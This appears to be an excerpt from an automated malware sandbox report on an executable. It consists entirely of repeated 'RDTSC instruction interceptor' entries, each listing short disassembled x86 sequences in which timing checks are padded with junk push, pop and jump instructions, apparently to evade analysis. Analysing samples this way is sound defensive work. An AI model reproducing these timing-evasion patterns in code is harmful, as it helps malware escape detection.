                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2595A second address: C25960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C24C62 second address: C24C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C24C67 second address: C24C88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A645h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FD668F2A636h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C24C88 second address: C24C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C24DD4 second address: C24DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C25203 second address: C25208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C254E3 second address: C254E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C254E7 second address: C254F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2B2F3 second address: C2B2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2B2FB second address: C2B304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2B494 second address: C2B4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007FD668F2A636h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2BAD0 second address: C2BAEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A775h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2BDA9 second address: C2BDB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD668F2A636h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2BDB3 second address: C2BDC3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD668F2A768h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2CB78 second address: C2CB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2CB7E second address: C2CBA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD668F2A76Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD668F2A770h 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2CBA3 second address: C2CBCB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jp 00007FD668F2A636h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jnc 00007FD668F2A63Eh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2CBCB second address: C2CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B8744E second address: B87467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD668F2A636h 0x0000000a jmp 00007FD668F2A63Fh 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B87467 second address: B8749E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jl 00007FD668F2A766h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007FD668F2A77Ch 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B8749E second address: B874A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B874A4 second address: B874A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B874A9 second address: B874AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32768 second address: C32779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007FD668F2A768h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32779 second address: C3278F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A642h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32BF9 second address: C32C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32C0C second address: C32C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD668F2A63Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32DC0 second address: C32DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32F39 second address: C32F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A641h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32F51 second address: C32F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3309D second address: C330B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jl 00007FD668F2A636h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jnc 00007FD668F2A636h 0x00000019 popad 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3322D second address: C33243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Bh 0x00000009 jg 00007FD668F2A766h 0x0000000f popad 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C33243 second address: C3326A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD668F2A64Dh 0x00000008 jmp 00007FD668F2A645h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FD668F2A636h 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3326A second address: C3326E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C414EB second address: C41513 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD668F2A63Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FD668F2A638h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 je 00007FD668F2A636h 0x0000001d push edx 0x0000001e pop edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C41513 second address: C4151E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD668F2A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C4151E second address: C41524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C41524 second address: C4152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3F8F7 second address: C3F8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FCFC second address: C3FD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FD00 second address: C3FD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FD0A second address: C3FD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FD10 second address: C3FD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FD14 second address: C3FD2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C4012C second address: C40144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A63Eh 0x00000009 js 00007FD668F2A636h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C4138A second address: C4138E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3F2FB second address: C3F302 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B8C373 second address: B8C379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C530CF second address: C530EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FD668F2A646h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C530EE second address: C5310A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5310A second address: C5311E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD668F2A636h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5311E second address: C53122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C52F89 second address: C52F9C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD668F2A63Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C550E1 second address: C550F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FD668F2A766h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C550F0 second address: C550F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C54CFF second address: C54D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C54D03 second address: C54D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5AAA4 second address: C5AAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A779h 0x00000009 jns 00007FD668F2A766h 0x0000000f popad 0x00000010 jmp 00007FD668F2A76Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5AAD7 second address: C5AADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5AADB second address: C5AAF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FD668F2A76Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C5A54D second address: C5A551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C63436 second address: C63446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C667D0 second address: C667EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD668F2A644h 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C6A13B second address: C6A13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C6A13F second address: C6A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD668F2A63Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C6A14F second address: C6A158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C6A158 second address: C6A16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FD668F2A638h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C713C7 second address: C713DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD668F2A766h 0x00000008 jng 00007FD668F2A766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C7152D second address: C7153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD668F2A636h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C7153B second address: C71543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71543 second address: C71552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FD668F2A636h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71552 second address: C71556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71927 second address: C71932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71932 second address: C71936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C71936 second address: C7193F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C725B7 second address: C725BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C725BD second address: C725C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C725C4 second address: C725D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FD668F2A766h 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C725D0 second address: C725E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FD668F2A636h 0x0000000e jns 00007FD668F2A636h 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C7709B second address: C770A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FD668F2A766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C770A9 second address: C770AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C76C6D second address: C76CBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FD668F2A778h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD668F2A778h 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C76CBD second address: C76CC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007FD668F2A636h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C76CC8 second address: C76CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C840B9 second address: C840BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C95206 second address: C95221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD668F2A766h 0x0000000a jp 00007FD668F2A766h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 jbe 00007FD668F2A76Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D2E second address: C94D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D32 second address: C94D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D36 second address: C94D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FD668F2A645h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D55 second address: C94D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94D6F second address: C94D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD668F2A636h 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FD668F2A638h 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C94EE2 second address: C94F02 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD668F2A772h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FD668F2A799h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CAAEC9 second address: CAAECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: CA9FA8 second address: CA9FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD668F2A766h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push edx 0x00000010 jnp 00007FD668F2A766h 0x00000016 jbe 00007FD668F2A766h 0x0000001c pop edx 0x0000001d push esi 0x0000001e jne 00007FD668F2A766h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
